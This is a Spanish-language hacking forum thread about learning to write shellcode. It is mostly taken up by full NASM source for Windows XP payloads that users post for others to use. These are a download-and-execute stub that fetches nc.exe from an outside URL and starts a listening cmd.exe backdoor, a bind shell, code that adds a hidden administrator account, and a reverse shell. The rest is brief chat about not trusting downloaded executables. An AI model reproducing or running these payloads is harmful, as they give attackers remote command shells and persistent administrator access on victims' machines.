 Autor
|
Tema: Aprender hacer shellcode (Leído 4,909 veces)
|
|
|
vicecity
 Desconectado
Mensajes: 894
|
que raro. la screen shot no sirve el link, el codigo de fuente tampoco. Solo el .exe ? no sera un virus o troyano ? ah y otra cosa. poner la dirección el navegador jjajaja porque tanto jajajaa lo descargue pero no pienso ejecutarlo |
|
|
|
|
En línea
|
|
|
|
|
Gospel
|
Jejejeje, no te fies ni de tu sombra.....
Vicecity, yo me he podido descargar el makeshell.zip, q contiene el programa ejecutable, un ejemplo en c++ y todo el proyecto en visual basic!!! Ya le echare un vistazo cuando tenga tiempo....
Lo de bajarse ejecutables no me mola, te pueden dar el palo por ir de sckript kiddie asi q haces bien en no ejecutar el .exe por si las moscas... bajate el fuente y despues de comprobar lo q hace, lo compilas y listo!!
................... .... ... .. .
Por cierto, te imaginas q el otro dia q me pediste el ejecutable del exploit 0349, te hubiera colado un virus o una shellcode de esas q se ha encontrado rojodos por ahi q en realidad se conectan a un equipo remoto, o devuelven una shell inversa!!???? Te hago la inocentada.... ¬_¬
Lo dicho, dont be a sckript kiddie....
Oye Jakin, cuando tenga tiempo ya le echare un vistazo a tu programa y si me ayuda a entender el mundillo de las shellcodes ahora q estoy empezando, mil gracias!!!
Saludos!!!!!
Feliz Año a todos!!!
|
|
|
|
|
En línea
|
|
|
|
mdada
Desconectado
Mensajes: 183
f
|
no rula el link del zip
|
|
|
|
|
En línea
|
|
|
|
|
Gospel
|
·_· ????
A mi si me rula el link del .zip!!! Le doy "guargar destino como" y el gestor de windows me lo descarga sin problemas y perfectamente....
|
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
Bueno, solo decir que estos programitas no me gustan nada, prefiero hacer las scodes a mano.....
No es por faltar el respeto a tu trabajo (que te habra costado un esfuerzo) si no porque HAY que aprender a hacer shellcodes, pues es mas necesario de lo que parece....
Prefiero el source de un troyano que no compila que un generador de troyanos indetectables...
Yo quiero aprender, no ser un borrego... BEEEEE
Salu2
|
|
|
|
|
En línea
|
|
|
|
Jakin
Desconectado
Mensajes: 11
¡Amo YaBB SE!
|
insertar este código en asm en programa
BITS 32
ORG 0x0
Loadlibrary equ 0x77E5D961 ;es para un xp
Getprocaddres equ 0x77E5B332 ; para un xp en españo
%macro library 2
xor eax,eax
lea eax,%1
push eax
mov ebx,Loadlibrary
call ebx
test eax,eax
jz exit
mov ecx,eax
xor eax,eax
lea eax,%2
push eax
push ecx
mov ebx,Getprocaddres
call ebx
test eax,eax
jz exit
mov ecx,eax
%endmacro
jmp datos
start:
pop edi
ino:
library [edi-res+win],[edi-res+ioa]
push dword 0
push dword 0
push dword 0
push dword 1
lea eax,[edi-res+dow]
push eax
mov ebx,ecx
call ebx
mov esi,eax
inou:
library [edi-res+win],[edi-res+iua]
xor eax,eax
push eax
push dword 0x40000000
push eax
push eax
lea eax,[edi-res+url]
push eax
push esi
mov ebx,ecx
call ebx
mov esi,eax
alloc:
library [edi-res+ker],[edi-res+glo]
push dword 99999
push dword 0x40
mov ebx,ecx
call ebx
mov [ebp-0x20],eax
inrf:
library [edi-res+win],[edi-res+irf]
lea eax,[edi-res+bytes]
push eax
push dword 99999
push dword [ebp-0x20]
push esi
mov ebx,ecx
call ebx
inch:
library [edi-res+win],[edi-res+ich]
push esi
mov ebx,ecx
call ebx
lcreat:
library [edi-res+ker],[edi-res+lcr]
push dword 4
lea eax,[edi-res+fil]
push eax
mov ebx,ecx
call ebx
mov esi,eax
write:
library [edi-res+ker],[edi-res+lwr]
mov eax, [edi-res+bytes]
push eax
push dword [ebp-0x20]
push esi
mov ebx,ecx
call ebx
close:
library [edi-res+ker],[edi-res+lcl]
push esi
mov ebx,ecx
call ebx
exec:
library [edi-res+ker],[edi-res+exe]
push dword 5
lea eax,[edi-res+par]
push eax
mov ebx,ecx
call ebx
jmp exit
exit:
library [edi-res+ker],[edi-res+exi]
xor eax,eax
push eax
mov ebx,ecx
call ebx
datos:
call start
res dd 0
bytes dd 0
url db "http://www.gratisweb.com/garrochoman/nc.exe",0
fil db "nc.exe",0
par db "nc.exe -L -d -e cmd.exe -p 9995",0
dow db "downloaders",0
ker db "kernel32.dll",0
win db "wininet.dll",0
lcr db "_lcreat",0
lwr db "_lwrite",0
lcl db "_lclose",0
glo db "GlobalAlloc",0
exe db "WinExec",0
exi db "ExitProcess",0
ioa db "InternetOpenA",0
iua db "InternetOpenUrlA",0
irf db "InternetReadFile",0
ich db "InternetCloseHandle",0
|
|
|
|
« Última modificación: 5 Enero 2004, 14:39 por Jakin »
|
En línea
|
|
|
|
4e,65,6f
Visitante
|
una simple pregunta...eso que ace??
PD:es para aclararme algo
|
|
|
|
|
En línea
|
|
|
|
cokeing
Desconectado
Mensajes: 1.036
SôNïC r0oLz
|
Alguien me podria explicar que es una "Shellcode"? porque si lo separo:
Shell -> interprete de comandos
Code -> codigo
es el codigo de un interprete de comandos?
ejemplo: el codigo en ASM de BASH.
¿??
saludos.cokeing
|
|
|
|
|
En línea
|
|
|
|
|
|
Tetaidrocarnabidol
Desconectado
Mensajes: 2
¡Amo YaBB SE!
|
algún subnormal puso mi nombre en la contraseña y borró del sevidor los programas en fin era fácil sin comentarios xDDDD si alguien quiere el programa que me mande un correo a sande600@hotmail.comel que lo tenga os pongo una bindshell aki estan xDDDD BITS 32
ORG 0x0
LoadLibrary equ 0x77E5D961
GetProcessA equ 0x77E5B332
%macro offside 2
xor eax,eax
lea eax,%1
push eax
mov ebx,LoadLibrary
call ebx
test eax,eax
jz exit
mov ecx,eax
xor eax,eax
lea eax,%2
push eax
push ecx
mov ebx,GetProcessA
call ebx
test eax,eax
jz exit
mov ecx,eax
%endmacro
STRUC WSADATA
.wVersion resw 1
.wHighVersion resw 1
.szDescription resb 256+1
.szSystemStatus resb 128+1
.iMaxSockets resw 1
.iMaxUdpDg resw 1
.lpVendorInfo resd 1
ENDSTRUC
STRUC sockaddr
.sin_family resw 1
.sin_port resd 1
.sin_addr resd 1
.sin_zero resb 8
ENDSTRUC
STRUC PROCESS_INFORMATION
.hProcess resd 1
.hThread resd 1
.dwProcessID resd 1
.dwThreadID resd 1
ENDSTRUC
STRUC STARTUPINFO
.cb resd 1
.lpReserved resd 1
.lpDesktop resd 1
.lpTitle resd 1
.dwX resd 1
.dwY resd 1
.dwXSize resd 1
.dwYSize resd 1
.dwXCountChars resd 1
.dwYCountChars resd 1
.dwFillAttribute resd 1
.dwFlags resd 1
.wShowWindow resw 1
.cbReserved2 resw 1
.lpReserved2 resd 1
.hStdInput resd 1
.hStdOutput resd 1
.hStdError resd 1
ENDSTRUC
STRUC SECURITY_ATTRIBUTES
.nLength resd 1
.lpSecurityDescriptor resd 1
.bInheritHandle resd 1
ENDSTRUC
jmp datos
start:
pop edi
startup:
sub esp, WSADATA_size
and esp, 0x0FFFFFFFC
mov esi,esp
offside [edi-res+lib],[edi-res+wsa]
push esi
push dword 0x101
mov ebx,ecx
call ebx
Alloc:
offside [edi-res+ker],[edi-res+all]
push dword 99999
push dword 0x40
mov ebx,ecx
call ebx
mov [edi-res+byt],eax
sock:
offside [edi-res+lib],[edi-res+wss]
xor eax,eax
push eax
inc eax
push eax
inc eax
push eax
mov ebx,ecx
call ebx
cmp eax,1
jb exit
mov esi,eax
blind:
offside [edi-res+lib],[edi-res+bin]
push dword 0
push dword 0
push dword 0
push dword 0xCE630002 ; 25550
mov ebx,esp
push byte 16
push ebx
push esi
mov ebx,ecx
call ebx
cmp eax,-1
jz exit
listen:
offside [edi-res+lib],[edi-res+lis]
push byte 1
push esi
mov ebx,ecx
call ebx
cmp eax,-1
jz exit
createpipe1:
offside [edi-res+ker],[edi-res+crp]
sub esp, SECURITY_ATTRIBUTES_size
and esp, 0x0FFFFFFFC
mov dword [esp],12
mov dword [esp+4],0
mov dword [esp+8],1
mov edx,esp
push dword 0
push edx
lea eax,[edi-res+srw]
push eax
lea eax,[edi-res+srd]
push eax
mov ebx,ecx
call ebx
cmp eax,0
jz exit
createpipe2:
offside [edi-res+ker],[edi-res+crp]
sub esp, SECURITY_ATTRIBUTES_size
and esp, 0x0FFFFFFFC
mov dword [esp],12
mov dword [esp+4],0
mov dword [esp+8],1
mov edx,esp
push dword 0
push edx
lea eax,[edi-res+rrw]
push eax
lea eax,[edi-res+rrd]
push eax
mov ebx,ecx
call ebx
cmp eax,0
jz exit
getinfo:
offside [edi-res+ker],[edi-res+get]
sub edx, STARTUPINFO_size
and edx, 0x0FFFFFFFC
push edx
mov ebx,ecx
call ebx
createpro:
offside [edi-res+ker],[edi-res+cre]
sub edx, STARTUPINFO_size
and edx, 0x0FFFFFFFC
mov dword [edx],68
mov eax,[edi-res+srw]
mov [edx+64],eax
mov [edx+60],eax
mov eax,[edi-res+rrd]
mov dword [edx+56], eax
mov dword [edx+44],0x101
mov word [edx+48],0
sub esp,PROCESS_INFORMATION_size
and esp, 0x0FFFFFFFC
mov ebx,esp
sub esp, SECURITY_ATTRIBUTES_size
and esp, 0x0FFFFFFFC
mov dword [esp],12
mov dword [esp+4],0
mov dword [esp+8],1
mov eax,esp
push ebx
push edx
push dword 0
push dword 0
push dword 0x20
push dword 1
push dword eax
push dword eax
lea eax,[edi-res+cmd]
push eax
push dword 0
mov ebx,ecx
call ebx
cmp eax,0
jz exit
CloseHandle1:
offside [edi-res+ker],[edi-res+clh]
push dword [edi-res+srw]
mov ebx,ecx
call ebx
closehandle2:
offside [edi-res+ker],[edi-res+clh]
push dword [edi-res+rrd]
mov ebx,ecx
call ebx
apcept:
offside [edi-res+lib],[edi-res+apc]
push dword 0
push dword 0
push esi
mov ebx,ecx
call ebx
cmp eax,1
jb exit
mov esi,eax
mandar:
offside [edi-res+ker],[edi-res+pip]
xor eax,eax
push eax
push eax
lea eax,[edi-res+bys]
push eax
push dword 1024
push dword 0
push dword [edi-res+srd]
mov ebx,ecx
call ebx
cmp eax,0
jz recibir
cmp dword [edi-res+bys],0
jz recibir
offside [edi-res+ker],[edi-res+red]
push dword 0
push dword [edi-res+bys]
push dword [edi-res+bys]
push dword [edi-res+byt]
push dword [edi-res+srd]
mov ebx,ecx
call ebx
cmp eax,0
jz recibir
offside [edi-res+lib],[edi-res+sen]
push dword 0
push dword [edi-res+bys]
push dword [edi-res+byt]
push esi
mov ebx,ecx
call ebx
cmp eax,-1
jz recibir
offside [edi-res+ker],[edi-res+sle]
push dword 100
mov ebx,ecx
call ebx
jmp mandar
recibir:
offside [edi-res+lib],[edi-res+rev]
push dword 0
push dword 1024
push dword [edi-res+byt]
push esi
mov ebx,ecx
call ecx
cmp eax,-1
jz exit
cmp eax,0
jz exit
mov edx,eax
offside [edi-res+ker],[edi-res+wri]
push dword 0
push dword [edi-res+bys]
push dword edx
push dword [edi-res+byt]
push dword [edi-res+rrw]
mov ebx,ecx
call ebx
cmp eax,0
jz exit
offside [edi-res+ker],[edi-res+sle]
push dword 100
mov ebx,ecx
call ebx
jmp mandar
;msgbox:
; offside [edi-res+use],[edi-res+mgb]
; xor eax,eax
; inc eax
; push eax
; lea eax,[edi-res+men]
; push eax
; push eax
; push dword 0
; mov ebx,ecx
; call ebx
exit:
offside [edi-res+lib],[edi-res+wsc]
mov ebx,ecx
call ebx
offside [edi-res+lib],[edi-res+clo]
push esi
mov ebx,ecx
call ebx
offside [edi-res+ker],[edi-res+exi]
xor eax,eax
push eax
mov ebx,ecx
call ebx
datos:
call start
res dd 0
cmd db "cmd.exe",0
lib db "WS2_32.DLL",0
ker db "kernel32.dll",0
lis db "listen",0
sle db "Sleep",0
apc db "accept",0
clo db "closesocket",0
bin db "bind",0
wss db "socket",0
wsa db "WSAStartup",0
wsc db "WSACleanup",0
exi db "ExitProcess",0
cre db "CreateProcessA",0
crp db "CreatePipe",0
clh db "CloseHandle",0
get db "GetStartupInfoA",0
all db "GlobalAlloc",0
pip db "PeekNamedPipe",0
red db "ReadFile",0
wri db "WriteFile",0
sen db "send",0
rev db "recv",0
srd dd 0
srw dd 0
rrd dd 0
rrw dd 0
bys dd 0
byt dd 0
;use db "user32.dll", 0
;mgb db "MessageBoxA", 0
;men db "correcto",0
un saludo |
|
|
|
« Última modificación: 4 Febrero 2004, 17:09 por Tetaidrocarnabidol »
|
En línea
|
|
|
|
byebye
Desconectado
Mensajes: 5.094
|
te falta poner para que windows es.
|
|
|
|
|
En línea
|
|
|
|
Marcelino
Desconectado
Mensajes: 3
¡Amo YaBB SE!
|
Aki teneis una código que añade un usuario como administrador,solo teneis que ponerla en el programa y zas ya teneis la shellcode.
[BITS 32]
ORG 0x0
LoadLibrary equ 0x77E5D961 ; para windows xp español
GetProcessA equ 0x77E5B332
%macro OffSide 2
xor eax,eax
lea eax,%1
push eax
mov ebx,LoadLibrary
call ebx
test eax,eax
jz exit
mov ecx,eax
xor eax,eax
lea eax,%2
push eax
push ecx
mov ebx,GetProcessA
call ebx
test eax,eax
jz exit
mov ecx,eax
%endmacro
STRUC USER_INFO_1
.usri1_name resd 1
.usri1_password resd 1
.usri1_password_age resd 1
.usri1_priv resd 1
.usri1_home_dir resd 1
.usri1_comment resd 1
.usri1_flags resd 1
.usri1_script_path resd 1
ENDSTRUC
STRUC LOCALGROUP_MEMBERS_INFO_3
.lgrmi3_domainandname resd 1
ENDSTRUC
jmp datos
start:
pop edi
netuseradd:
OffSide [edi-res+net],[edi-res+neu]
push dword 0
push dword 0x0000006E
push dword 0x00550063 ;user ErcUn pass ErcUn
push dword 0x00720045
mov esi, esp
push dword 0x005c0000
mov [ebp+0x20],esi
sub esp, USER_INFO_1_size
and esp, 0x0FFFFFFFC
mov dword [esp],esi ;strconv(user,vbunicode)
mov dword [esp+4],esi ;strconv(pass,vbunicode)
mov dword [esp+8],0
mov dword [esp+12],1
mov dword [esp+16],0
mov dword [esp+20],0
mov dword [esp+24],0x201 ;UF_NORMAL_ACCOUNT Or UF_SCRIPT
mov dword [esp+28],0
mov ebx, esp
push dword 0
push ebx
push dword 1
push dword 0
mov ebx,ecx
call ecx
NetLocalGroupAddMembers:
OffSide [edi-res+net],[edi-res+nel]
push dword 0 ;null
push dword 0x00000073
push dword 0x00650072
push dword 0x006F0064 ;Administradores
push dword 0x00610072
push dword 0x00740073
push dword 0x0069006E
push dword 0x0069006D
push dword 0x00640041
mov edx,esp ;strconv(localgroupname,vbunicode)
mov ebx, [ebp+0x20]
sub ebx,2 ;strptr(user)
sub esp, LOCALGROUP_MEMBERS_INFO_3_size
and esp, 0x0FFFFFFFC
mov dword [esp],ebx
mov ebx,esp
push dword 1
push ebx
push dword 3
push dword edx
push dword 0
mov ebx,ecx
call ebx
;msgbox:
;OffSide [edi-res+use],[edi-res+mgb]
;xor eax,eax
;inc eax
; push eax
;lea eax,[edi-res+men]
;push eax
;push eax
;push dword 0
; mov ebx,ecx
;call ebx
exit:
OffSide [edi-res+ker],[edi-res+exi]
xor eax,eax
push eax
mov ebx,ecx
call ebx
datos:
call start
res dd 0
ker db "kernel32.dll",0
net db "netapi32.dll",0
exi db "ExitProcess",0
neu db "NetUserAdd",0
nel db "NetLocalGroupAddMembers",0
;use db "user32.dll", 0
;mgb db "MessageBoxA", 0
;men db "Correcto",0
espero que lo difruteis almenos lo mismo que yo lo he difrutado programando
|
|
|
|
|
En línea
|
|
|
|
vicecity
Desconectado
Mensajes: 894
|
no lo he probado pero tengo una duda, sirve para agregar un usuario con poder de administrador pero necesitas estar logeado como administrator o puede ser un usuario comun y corriente sin muchos privilegios?
|
|
|
|
|
En línea
|
|
|
|
Jhon Wey
Desconectado
Mensajes: 4
¡Amo YaBB SE!
|
aki os pongo una reverse shell,poner en le programa y how teneis la shellcode.También os pongo un programa que te pasa la ip a hexacesimal y a la inversa solo copiarla y ponerla en el código en asm.XDDDD no se algo hay que decir.XDDD primero el programilla.son los sources en visual basic. http://www.iespana.es/garrochoman3/iphex.zipy el código BITS 32
ORG 0x0
LoadLibrary equ 0x77E5D961
GetProcessA equ 0x77E5B332
%macro OffSide 2
xor eax,eax
lea eax,%1
push eax
mov ebx,LoadLibrary
call ebx
test eax,eax
jz exit
mov ecx,eax
xor eax,eax
lea eax,%2
push eax
push ecx
mov ebx,GetProcessA
call ebx
test eax,eax
jz exit
mov ecx,eax
%endmacro
STRUC WSADATA
.wVersion resw 1
.wHighVersion resw 1
.szDescription resb 256+1
.szSystemStatus resb 128+1
.iMaxSockets resw 1
.iMaxUdpDg resw 1
.lpVendorInfo resd 1
ENDSTRUC
STRUC sockaddr
.sin_family resw 1
.sin_port resd 1
.sin_addr resd 1
.sin_zero resb 8
ENDSTRUC
STRUC PROCESS_INFORMATION
.hProcess resd 1
.hThread resd 1
.dwProcessID resd 1
.dwThreadID resd 1
ENDSTRUC
STRUC STARTUPINFO
.cb resd 1
.lpReserved resd 1
.lpDesktop resd 1
.lpTitle resd 1
.dwX resd 1
.dwY resd 1
.dwXSize resd 1
.dwYSize resd 1
.dwXCountChars resd 1
.dwYCountChars resd 1
.dwFillAttribute resd 1
.dwFlags resd 1
.wShowWindow resw 1
.cbReserved2 resw 1
.lpReserved2 resd 1
.hStdInput resd 1
.hStdOutput resd 1
.hStdError resd 1
ENDSTRUC
STRUC SECURITY_ATTRIBUTES
.nLength resd 1
.lpSecurityDescriptor resd 1
.bInheritHandle resd 1
ENDSTRUC
jmp datos
start:
pop edi
startup:
OffSide [edi-res+lib],[edi-res+wsa]
sub esp, WSADATA_size
and esp, 0x0FFFFFFFC
mov esi,esp
push esi
push dword 0x101
mov ebx,ecx
call ebx
sock:
OffSide [edi-res+lib],[edi-res+wss]
xor eax,eax
push eax
inc eax
push eax
inc eax
push eax
mov ebx,ecx
call ebx
cmp eax,1
jb exit
mov esi,eax
createpipe1:
OffSide [edi-res+ker],[edi-res+crp]
sub esp, SECURITY_ATTRIBUTES_size
and esp, 0x0FFFFFFFC
mov dword [esp],12
mov dword [esp+4],0
mov dword [esp+8],1
mov edx,esp
push dword 0
push edx
lea eax,[edi-res+srw]
push eax
lea eax,[edi-res+srd]
push eax
mov ebx,ecx
call ebx
cmp eax,0
jz exit
createpipe2:
OffSide [edi-res+ker],[edi-res+crp]
sub esp, SECURITY_ATTRIBUTES_size
and esp, 0x0FFFFFFFC
mov dword [esp],12
mov dword [esp+4],0
mov dword [esp+8],1
mov edx,esp
push dword 0
push edx
lea eax,[edi-res+rrw]
push eax
lea eax,[edi-res+rrd]
push eax
mov ebx,ecx
call ebx
cmp eax,0
jz exit
getinfo:
OffSide [edi-res+ker],[edi-res+get]
sub edx, STARTUPINFO_size
and edx, 0x0FFFFFFFC
push edx
mov ebx,ecx
call ebx
createpro:
OffSide [edi-res+ker],[edi-res+cre]
sub edx, STARTUPINFO_size
and edx, 0x0FFFFFFFC
mov dword [edx],68
mov eax,[edi-res+srw]
mov [edx+64],eax
mov [edx+60],eax
mov eax,[edi-res+rrd]
mov dword [edx+56], eax
mov dword [edx+44],0x101
mov word [edx+48],0
sub esp,PROCESS_INFORMATION_size
and esp, 0x0FFFFFFFC
mov ebx,esp
sub esp, SECURITY_ATTRIBUTES_size
and esp, 0x0FFFFFFFC
mov dword [esp],12
mov dword [esp+4],0
mov dword [esp+8],1
mov eax,esp
push ebx
push edx
push dword 0
push dword 0
push dword 0x20
push dword 1
push dword eax
push dword eax
lea eax,[edi-res+cmd]
push eax
push dword 0
mov ebx,ecx
call ebx
;cmp eax,0
;jz exit
CloseHandle1:
OffSide [edi-res+ker],[edi-res+clh]
push dword [edi-res+srw]
mov ebx,ecx
call ebx
closehandle2:
OffSide [edi-res+ker],[edi-res+clh]
push dword [edi-res+rrd]
mov ebx,ecx
call ebx
Alloc:
OffSide [edi-res+ker],[edi-res+all]
push dword 99999
push dword 0x40
mov ebx,ecx
call ebx
mov [edi-res+byt],eax
conn:
OffSide [edi-res+lib],[edi-res+con]
sub esp, sockaddr_size
and esp, 0x0FFFFFFFC
mov word [esp],2
mov dword [esp+2],0xCE630002 ; port = 25550
mov dword [esp+6],0x0100007F ; ip = 127.0.0.1
mov edx,esp
push byte 16
push edx
push esi
mov ebx,ecx
call ebx
cmp eax,0
jz exit
mov esi,eax
jmp mandar
mandar:
OffSide [edi-res+ker],[edi-res+pip]
xor eax,eax
push eax
push eax
lea eax,[edi-res+bys]
push eax
push dword 1024
push dword 0
push dword [edi-res+srd]
mov ebx,ecx
call ebx
cmp eax,0
jz recibir
cmp dword [edi-res+bys],0
jz recibir
OffSide [edi-res+ker],[edi-res+red]
push dword 0
push dword [edi-res+bys]
push dword [edi-res+bys]
push dword [edi-res+byt]
push dword [edi-res+srd]
mov ebx,ecx
call ebx
cmp eax,0
jz recibir
OffSide [edi-res+lib],[edi-res+sen]
push dword 0
push dword [edi-res+bys]
push dword [edi-res+byt]
push esi
mov ebx,ecx
call ebx
cmp eax,-1
jz recibir
OffSide [edi-res+ker],[edi-res+sle]
push dword 100
mov ebx,ecx
call ebx
jmp mandar
recibir:
OffSide [edi-res+lib],[edi-res+rev]
push dword 0
push dword 1024
push dword [edi-res+byt]
push esi
mov ebx,ecx
call ecx
cmp eax,-1
jz exit
cmp eax,0
jz exit
mov edx,eax
OffSide [edi-res+ker],[edi-res+wri]
push dword 0
push dword [edi-res+bys]
push dword edx
push dword [edi-res+byt]
push dword [edi-res+rrw]
mov ebx,ecx
call ebx
cmp eax,0
jz exit
OffSide [edi-res+ker],[edi-res+sle]
push dword 100
mov ebx,ecx
call ebx
jmp mandar
exit:
OffSide [edi-res+lib],[edi-res+clo]
push esi
mov ebx,ecx
call ebx
OffSide [edi-res+lib],[edi-res+wsc]
mov ebx,ecx
call ebx
OffSide [edi-res+ker],[edi-res+exi]
push dword 0
mov ebx,ecx
call ebx
datos:
call start
res dd 0
cmd db "cmd.exe"
lib db "WS2_32.DLL",0
ker db "kernel32.dll",0
sle db "Sleep",0
con db "connect",0
wss db "socket",0
clo db "closesocket",0
wsa db "WSAStartup",0
wsc db "WSACleanup",0
exi db "ExitProcess",0
cre db "CreateProcessA",0
crp db "CreatePipe",0
clh db "CloseHandle",0
get db "GetStartupInfoA",0
all db "GlobalAlloc",0
pip db "PeekNamedPipe",0
red db "ReadFile",0
wri db "WriteFile",0
sen db "send",0
rev db "recv",0
srd dd 0
srw dd 0
rrd dd 0
rrw dd 0
bys dd 0
byt dd 0
|
|
|
|
|
En línea
|
|
|
|
|
 |
